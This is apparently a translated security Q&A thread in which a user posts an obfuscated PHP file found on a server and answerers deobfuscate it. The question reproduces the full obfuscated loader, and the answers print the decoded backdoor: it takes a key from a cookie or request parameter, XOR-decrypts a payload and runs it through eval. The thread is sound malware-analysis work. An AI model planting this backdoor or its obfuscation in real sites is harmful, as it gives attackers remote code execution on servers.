¿Cómo desobstruir este malware PHP? [duplicar]

Question

¿Cómo desobstruir este malware PHP? [duplicar]

#1 de thexacre (16 votos)
#2 de deed02392 (9 votos)
#3 de munkeyoto (1 votos)

12

Hace dos días, apareció un archivo llamado "images.php" en el servidor de un amigo, que se dio cuenta porque causó errores. El archivo contenía lo siguiente. Este código es de origen desconocido y se presume que es malware, por lo que NO LO EJECUTE

<?php for($o=0,$e='&\'()*+,-.:]^_'{|,,,|-((.(*,|)')&(_(*,+)'(-(,+_(-(.(:(](^(_('({)]+'+{+|,&-^-_(^)](](^(_(^(:('(,-_(.-_(](:(,+_(-+_(--_('(.(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^('(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-('(:(.(,(.(.+_(-(.+'(,-_(.('(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,('(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+'(',&(:+{(.-^(_-_('-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(')](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^('('(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|('('(.(.+_(--^(,(.(:+{+_(-+'('+_(-(:('(:-_(,,&(,-_(.+{(,+_(-(:)]('+_(-(.+{(_+_(-(_+'+_(-)]+_(-(_(,(.(:('(')]+_(-,&(:+'+_(--^(.(.('(_(,-^(:('(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](:(_(:(,(,-_('+{(]-^(.('('-_+_(-(,(,(^(^-^+_(-('(,+'(:(_(:+|+_(-({('+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(')](^-_(_(:(^+'(_+'('+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+'(:+|(,)](:({(]+'(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:('(]+'(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+'(,+'(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+'(:(](.(,(]-^+_(-('(,({('(^('(^(.+'(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:('(.+_(-(,(:(.(,+_(--^(:)]('-^(]+|(:(_(^-^+_(-('(,('(:-^(,(_(,-_(.+{(,-_(.)]('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:(_+_(-+'(:(_(,(](_,&('-_(](.('-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+'(:(_(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+'(](_+_(-('(,(^('(^('(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-('(](:('(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+'(^(:(,+'(,(.(.+_(-(.,&+_(-)]('+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+'(:+|(,(_(,-_(.+{(,-_(.)]('+_(-(]('(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+'(,-^(,(:(:(:(.+'(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+'(,-^(,(:(:(:(.+'(:(^(.(,(,(.(.-_(:+'(,('+_(-+'(^(:(,+'(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+'(](_+_(-('(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+'(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:('+_(-({+_(-+'(^(:(,+'(,-^(:+_(-('(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-('+_(-(:(:('(:+'(^(,('(:(,(](.(^('(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+'(.+{(.(,(,+'(.+|(^+'+_(-(:(,)](:-^(:+|(],&('+'(^+_(-(:('(^+|(](](_+'(^(^+_(-+'(,-^(:+_(-(:(.(]+'(:+'(,+|(_+'(.+_(-(,-^(_(^(^(^+_(-(:(,(^('(.(:+'(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('(](](_(,+'(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:('(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+'(.)](^+'(^(^(]('+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-('+_(-(:(:+{(.+'+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&('-_(](.('-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+'(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_('-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+'+_(-('(.,&(^('(,+_(-(:(](:+{(:('(,(:(,+|(,,&(.-_(.(.(:(](.(](^+'+_(--^(](.('+{(_(.(_(,(:+'(,+|(_(.('('(,({(.(](^({(.,&(,({(:,&(:('(,+|(:+'(,,&(_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:('(.,&(]+'(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+'(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^('(.(.+_(-(:(^(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,+_(-+_(-(:+'(,+|(_(.(:-^(,+'(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,('+_(-)](:+|('+_(-(.+'(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,(](:(_({+_(-('(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_('+'+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.('(:(^(.+{(:+'(,('(_,&+_(--_(])]+_(-)](:('(.,&+_(--_(.+_(-(,(](_(.('(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)]('-^(,(_(:+|(,)](.+{(:+'(:(](:(:(^('+_(--^+_(--^(:('('-^(:('('+'(^+_(-(:('(.+{(_+_(-(_+'+_(-)](^(.(,({(:+'(:+|(,)](:({(]+'(:)](:('(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+'(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('+{(],&(:)](:('(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&('+'(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-('(](:('(^(:+'(,+{(:,&(]+'(.(](:)]+_(--_(_(^(^(:(,+'(,-^(:+_(-(_(:(]+'(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^('(.(:({(,)](.('(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(',&('(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-('(,({('(.(:+_(-(,-_(:-_+_(-+'(.-_(.(]+_(-({(]-_(^(,(,('(,(^(:+_(-(.,&(,(:(:+|(,(](_+'(.-^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^('(_(,(.(,+'(.+_(-(.+'+_(--^(:+{+_(-({(:-_('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+'(]-_(:+_(-('(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+'(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+'(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.('(.(,,&('({('(_(,(.(,(](.(.(:+|(,(]('+{(]-^(.)]('+'(]+|(:('+_(-+_(-(^+{(](.('+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(]('(_+_(-(](,-^(:,&(:-_(](.('('(,+|(_(:('-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)]('-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+'('(.(,(]('-^(]+{('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,('(_(:(_(^+_(-(:+'(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_('-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+'(:(:(,(^(_,&+_(-(.+_(-+_(-(]('(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_('+{(^('(,(,+_(-)](:(:(.(,(](.('(]+_(-+'(.(:(.(_(,-^(_(.+_(-+'(^(^+_(-)]('(^('(,(](_(_(.(^('('(](:('+_(-)](:('(^('(,+{(](:('(^(.)](,(:(.(:(,-_(_,&('+'(]+|(:(.+_(-+_(-(^+{(]('(_(,(_(](^(](:(.+_(-({(:({(:('+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&('-_(],&(:,&('+_(-(](.(_+|+_(-+'(^(_(,,&('+{('(,(](:(.({(.+'(.+|(:(^(,('(.+'(](^+_(-('(](:('(_(:-_(:+_(-(_(:(:('(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^('+'('({(.+'(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+'(,-_('(,(](:(.({(]-^(.(^('({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+'(](.('('(,+|+_(-+_(-(_('(:(_(_+|(,,&(,-_(.+{(:(](:+'(,(_(:+|+_(-)](.-_('-^(]-_(.(:(_,&(](:(:(_('+{(_(.(.+'(.(:+_(-({(.(^(:(^(:(](.(_(^+'+_(-,&+_(-({(:('('+_(-(]-^(.(:(](:('+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{('(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(')]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](',&(,(^(_({(.+'(.-_(.-^(,-^(.(_+_(--^(^(_(,({('-^(',&(,(^('+'(^+_(-(.-_(:(^(,(:(.+'+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_('-^(])]+_(-)](^({(^(,(]('('(_(:(_(](:(_({+_(-('(](,(')](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.('(]+'(.+|(:(:+_(--_(.(_(^-^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(]('('(_(.)](](_('('+_(-({(_(_('(.(,('(_+|(:+|(,)](_+_(-(^+{(:(,(,+|('+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+'(:(_(,(](_(.('(.(,+'(_)]+_(-(.(,(.(](.('+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+'(.-_(:({(](:(_+_(-(^+'(^-^(])](.(^(:+{(]({('+'(](:(](,(^-_(_(.(:-^(:+|('+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(]('('(,+_(--^(.-_(,('(]+'(_({('({(]-_(:('+_(-({(^(,(]+{+_(-+'(,,&(:-^(,(:(](^('+{('({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_('+{+_(-+|(:+'(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:('(_(.+'(](:('+'(_(,(](:(^-_(_(.(:-^(:+|('+{(_(.(^+{(^(,(]-^(:+_(-(^('(,+'(:(,+_(-)](.(,(^('+_(-(_(](:('(_(.+'(](_(_+{(^+{('(:(_(](](.('-^(:+|('+{(_(.(^+{(^(,(.+'(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&('-^(',&(,({('+'(^+_(-(](,(^-_(_(.(]+|(]+{('({(_(.(^+{(^(,(.+'(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&('+{(_(.(_(,(^+'(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({('+_(-(^+|(_(.(]+|(]+{('({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:('(^+|(](](_+'(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+'(:(:+_(-(:(.(,(^(^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+'(,(:(.+|('-^(]-_(.(_(,+{(]-_(^(_('(,(.-^(,(.(:+'(,)](.(.('(_+_(-({(:(,(](_+_(-('+_(-)](:(](:+|+_(--^(:(,(,(.(_+'(_('(^(^(_(^+_(-)]+_(-(_(,-^(.(]('(_(,(](.(_(,(_(.(_('(_(^)]('+{+_(-(_(^,&(,-_(:('(.-_(](^(:,&+_(--_(.(_(:+'(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^('(:(.(^(,+_(-('(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^('(_(])](,+'(',&(.-^(,(^('(,(_(.(_(,(^+'+_(-('(](,(^-_(,-^(.)](](^+_(-('(,(.(:(]('+_(-(.+'(.(,+_(--^(:({(.(^+_(--_(:('+_(--^(^(_(,({('-^('+{+_(-)](.(_+_(-+'(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:('(,('(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|('-^(',&(,)]('+'(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_('('(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_('('(,+{+_(-+_(-(_(.(:(_(_+|(,,&('({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+'(,+'(.+_(-(,(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+{+_(-(,(.+'(,(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+'(]-_(:+_(-('(,(^+_(-(.-^(_(,(](:(:(:(,('(:(_(^(:+_(-+{(,,&('+'(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({('+{(_(.+_(-('(^)](_(:(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|+_(-)](.(.(:(:(,('(.)](_)]+_(-('+_(-(:(:('(:+'(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+'+_(--^(:(](:('(.+_(-(,-_(:(,(](.(_-^(:(^(](.('-^(]+{('({(_(.(:('(:(^+_(-)](:(_(,(:(.+|('-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:('(:(,(,+|('+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+'(:(_(,(](_(:(.,&+_(-(:+_(-+'(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(:(,+'(,-^(:+_(-('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,('('(,(]('('('+_(-(:({(.-_('+|(.(](,(,+_(-('(_-_+_(-({(:({(:({+_(-(:(:+|(]+|('-^(:+|(^(_(,({(_-_(',&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+'(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.('+'(',&(,)]('+'(](:(:+_(-('(.(,({('({+_(-(.(.,&(:+{+_(-,&(,+'(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&('+'+_(-)](,-_(:-^+_(-+'(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](',&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-('(^)](,(:(.+|('-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+'(,)]+_(-(^(.('+_(--^(.+'(](.+_(-('+_(-({(,,&(:-^+_(-+'(:(,(](.(_(:('-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:('+_(-({(.,&(^(:(,+_(-(](:('(_(:+'(](:(_({+_(-('(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)]('-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)'(-(-)^*&,|-(,*(.(*,++^(*,|+'(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+'+')'(*,|)^-',+,_-),+-^(*,*({)'*&,),.-((.(.(*,.+^(*,++^(*,|+'+')_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+'+'(:(:)^-'-',:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)'(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)'(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)'(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-'(*,^)'(*+|*)*|*|*^*:*++^(-,^,+-:(-+')^,:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|+&*|+)+*+^(-,^,+-:(-+')^-',:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|*-*++*+^(-,^,+-:(-+')^-',:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-'(*,+,_)'*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)'*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)'(*,+,_(+(*,^,_)^(*,,,_)'(*,+,_('(*-(,_)^,,,|-((.(*,|)')&)^(*,|)_(*,,,_)^(*,|(^)'(*,^,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-',:,,(.(*-(,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)'*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-'-(,+-*-+-(,{(.(*,*(:)^-'(-(:)^-'(*,*)'*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

Reemplacé eval con echo , lo ejecuté en phpfiddle y obtuve más de la misma ofuscación, esta vez con varias líneas eval .

¿Cuál es la mejor manera de desenfocar este tipo de cosas para que pueda averiguar qué está haciendo?

malware php

pregunta Robert 01.05.2014 - 22:04

fuente

3 respuestas

9

He desenfocado completamente el código, solo por diversión.

Primero algunos comentarios sobre el lado malo del código. El uso del operador @ se aplica a casi todas las llamadas de función. Esto suprimirá las advertencias que podría generar el código, por lo que ayuda a mantenerlo oculto a los administradores de sistemas que revisan regularmente sus registros.

NB , no sé por qué la definición de la función decrypt() tiene lugar en un eval() . El código funciona exactamente igual si solo declara la función como está en la cláusula if 's true .

Aquí está el código completo otra vez:

// Compatibility for old versions of PHP which used different variable naming
if (!@isset($_SERVER)) {
    $_COOKIE =& $HTTP_COOKIE_VARS;
    $_POST =& $HTTP_POST_VARS;
    $_GET =& $HTTP_GET_VARS;
}
// If there's a cookie called "key" set $k to be the payload
$k = $_COOKIE['key'];
if (empty($k)) {
    $k = $_POST['key'];
}
// If there's no cookie then get the payload from a get parameter called 'key'
if (empty($k)) {
    $k = $_GET['key'];
}

// Define a function to de-obfuscate the payload
if (!@function_exists('decrypt')) {
    eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');
}
// Set $d to the de-obfuscated payload
$d = @decrypt($d, $k);

// eval $d
eval($d);

Y ahora veamos más profundamente en la función decrypt() . Limpiado, se ve así:

function decrypt($encrypted_string, $key)
{
    if(!$key)
        return;

    $encrypted_string_len = @strlen($encrypted_string);
    $key_len = @strlen($key);
    $rl = $encrypted_string_len % $key_len;
    $fl = $encrypted_string_len - $rl;

    for($o=0; $o < $fl; $o += $key_len)
    {
        $p = @substr($encrypted_string, $o, $key_len);
        $d .= "$key" ^ "$p";
    }

    if($rl)
    {
        $p = @substr($encrypted_string, $fl, $rl);
        $key = @substr($key, 0, $rl);
        $d .= "$key" ^ "$p";
    }
    return($d);
}

Este es un esquema simple de encriptación basado en XOR. Se toma la clave y se evalúa la longitud relativa al mensaje. Si la longitud de la clave se divide exactamente en la longitud del mensaje, entonces recorre el mensaje tomando fragmentos de la longitud de la clave y ejecutando un XOR en toda la cadena ( ^ operador '), luego se acumula el resultado descifrado. Si no se divide exactamente, el fragmento restante es XOR con el comienzo de la clave hasta la longitud necesaria.

respondido por el deed02392 06.05.2014 - 18:09

fuente

1

Es Perl incrustado en PHP, por ejemplo, copie y pegue lo siguiente en un texto:

''=~('(?{'.('.,)./}'^'^^@@[]').'"'.('@-:}/@@]}@.@]}.@,@^'^'/@]][(%$]+@/*]^%^,|').',$/})')

$ more perltest 
''=~('(?{'.('.,)./}'^'^^@@[]').'"'.('@-:}/@@]}@.@]}.@,@^'^'/@]][(%$]+@/*]^%^,|').',$/})')

$ perl perltest 
omg they know perl
$

Desearía tener tiempo para deob en este momento. Mañana volveré a eso. Pero en esencia su código se metió dentro del código.

respondido por el munkeyoto 01.05.2014 - 22:57

fuente

Lea otras preguntas en las etiquetas malware php

¿Por qué el cifrado de archivos GPG es mucho más lento que otras implementaciones de AES? Pregunta sobre los ataques de diccionario en el cifrado simétrico de GnuPG

score 16 · Accepted Answer

Por lo general, es muy difícil para los creadores de malware ofuscar la llamada exec () o eval (), por lo que una buena técnica es reemplazar estas llamadas con un eco. Si haces eso con el código anterior, terminas con un montón de código más confuso, pero en su mayoría es basura, excepto por lo que está al final:

if(!@isset($_SERVER)){$_COOKIE=&$HTTP_COOKIE_VARS;$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;}$k=$_COOKIE['key'];if(empty($k)){$k=$_POST['key'];}if(empty($k)){$k=$_GET['key'];}if(!@function_exists('decrypt')){eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');}$d=@decrypt($d,$k);eval($d);

Si limpia esto bien (gracias a IntelliJ) con algunos comentarios que he añadido:

// Compatibility with really old versions of PHP I think
if (!@isset($_SERVER)) {
    $_COOKIE =& $HTTP_COOKIE_VARS;
    $_POST =& $HTTP_POST_VARS;
    $_GET =& $HTTP_GET_VARS;
}
// If there's a cookie called "key" set $k to be the payload
$k = $_COOKIE['key'];
if (empty($k)) {
    $k = $_POST['key'];
}
// If there's no cookie then get the payload from a get parameter called 'key'
if (empty($k)) {
    $k = $_GET['key'];
}

// Define a function to de-obfuscate the payload
if (!@function_exists('decrypt')) {
    eval('function decrypt($e,$k){if(!$k){return;}$el=@strlen($e);$kl=@strlen($k);$rl=$el%$kl;$fl=$el-$rl;for($o=0;$o<$fl;$o+=$kl){$p=@substr($e,$o,$kl);$d.="$k"^"$p";}if($rl){$p=@substr($e,$fl,$rl);$k=@substr($k,0,$rl);$d.="$k"^"$p";}return($d);}');
}
// Set $d to the de-obfuscated payload
$d = @decrypt($d, $k);

// eval $d
eval($d);

Lo que es mucho más fácil de entender.

Así que básicamente son:

Buscando una cookie llamada clave
Si no hay una cookie, verifique los parámetros de obtención
Desenmascarar la carga útil obtenida de una cookie u obtener un parámetro
evalúa ese código

